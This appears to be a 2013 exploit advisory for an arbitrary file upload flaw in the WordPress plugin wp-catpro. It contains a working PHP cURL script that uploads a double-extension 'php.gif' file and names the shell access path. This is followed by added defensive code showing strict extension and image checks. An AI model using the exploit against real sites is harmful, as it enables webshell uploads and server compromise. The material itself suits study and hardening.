WordPress plugin wp-catpro arbitrary file upload

Posted 2013-02-27 20:12:43
Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
-----------------------------------------------------------------------

Author => Zikou-16
Email => [email protected]
Tested on : Windows 7 , Backtrack 5r3
Download : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####

#=> Exploit info:
------------------
# An attacker can upload file/shell.php.gif
# ("jpg", "gif", "png")  // Allowed file extensions (only the last extension is compared, so a double extension passes)
# "/uploads/";  // The path where we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------

#=> Exploit
-----------
<?php

$uploadfile = "zik.php.gif";   // local file to upload; the double extension passes the extension whitelist

$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
// "@file" is the old cURL file-upload syntax: deprecated in PHP 5.5, removed in 7.0; use new CURLFile($uploadfile) there
curl_setopt($ch, CURLOPT_POSTFIELDS,
    array('Filedata' => "@$uploadfile",
          'folder'   => '/wp-content/uploads/catpro/'));   // destination folder is taken from the request
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);

print "$postResult";

// Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
?>

Contents of zik.php.gif:
<?php
phpinfo();
?>
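The advisory's whitelist check passes "shell.php.gif" because only the last extension is compared. The block below is an added illustration, not the wp-catpro plugin's code or the author's: it puts that kind of last-extension check next to a hardened handler that requires a single whitelisted extension, verifies the bytes really are an image, ignores the client-supplied 'folder' parameter and stores the file under a random server-chosen name. The function names, the base directory and the sample file names are assumptions.

```php
<?php
// Added illustration, not the wp-catpro plugin's code. It puts the kind of
// check the advisory describes (whitelist compared against the LAST extension
// only) next to a hardened upload handler. Function names, the base directory
// and the sample file names are assumptions.

$extension_whitelist = array("jpg", "gif", "png");   // as listed in the advisory

// Weak check: pathinfo() returns only the final extension, so "shell.php.gif"
// yields "gif" and is accepted. Whether the stored file then runs as PHP is
// up to the web server: Apache's "AddHandler application/x-httpd-php .php"
// matches ".php" anywhere in the name, a "<FilesMatch \.php$>" rule does not.
function weak_extension_ok($file_name, array $whitelist) {
    $ext = pathinfo($file_name, PATHINFO_EXTENSION);
    foreach ($whitelist as $allowed) {
        if (strcasecmp($ext, $allowed) == 0) {
            return true;
        }
    }
    return false;
}

// Strict name check: exactly one dot, extension whitelisted, case-insensitive.
// Returns the lower-cased extension on success, false otherwise.
function strict_extension($file_name, array $whitelist) {
    $parts = explode('.', basename($file_name));
    if (count($parts) !== 2 || $parts[0] === '') {
        return false;                          // rejects "shell.php.gif", ".gif", "shell"
    }
    $ext = strtolower($parts[1]);
    return in_array($ext, $whitelist, true) ? $ext : false;
}

// Hardened handler for a $_FILES entry (e.g. $_FILES['Filedata'], the field
// the exploit posts). The client-supplied 'folder' parameter is ignored:
// the destination directory is fixed server-side and the stored name is random.
function hardened_upload(array $file, $base_dir, array $whitelist) {
    if (!isset($file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        return false;
    }
    $ext = strict_extension($file['name'], $whitelist);
    if ($ext === false) {
        return false;
    }
    // Content must decode as the image type the extension claims, not just be named like one.
    $expected = array('jpg' => IMAGETYPE_JPEG, 'gif' => IMAGETYPE_GIF, 'png' => IMAGETYPE_PNG);
    $info = @getimagesize($file['tmp_name']);
    if ($info === false || $info[2] !== $expected[$ext]) {
        return false;
    }
    $target_dir = realpath($base_dir);
    if ($target_dir === false || !is_dir($target_dir)) {
        return false;
    }
    $new_name = bin2hex(random_bytes(16)) . '.' . $ext;   // random_bytes(): PHP 7+
    if (!move_uploaded_file($file['tmp_name'], $target_dir . DIRECTORY_SEPARATOR . $new_name)) {
        return false;
    }
    return $new_name;
}

// Name-check comparison on constructed file names (no files are written).
foreach (array("photo.gif", "shell.php.gif", "shell.php", "shell.gif.php", "x.PNG") as $name) {
    printf("%-14s weak=%-6s strict=%s\n",
        $name,
        weak_extension_ok($name, $extension_whitelist) ? "accept" : "reject",
        strict_extension($name, $extension_whitelist) !== false ? "accept" : "reject");
}
```

Run from the command line to see the comparison: "shell.php.gif" and "x.PNG" are accepted by the weak check, only "photo.gif" and "x.PNG" by the strict one. hardened_upload() needs a real $_FILES entry and a writable directory. The strict check defeats the advisory's double-extension trick regardless of how the server maps handlers; getimagesize() additionally refuses payloads that are not valid images, although a real image with PHP appended still passes it, which is why the single whitelisted extension and the random server-chosen name matter as well.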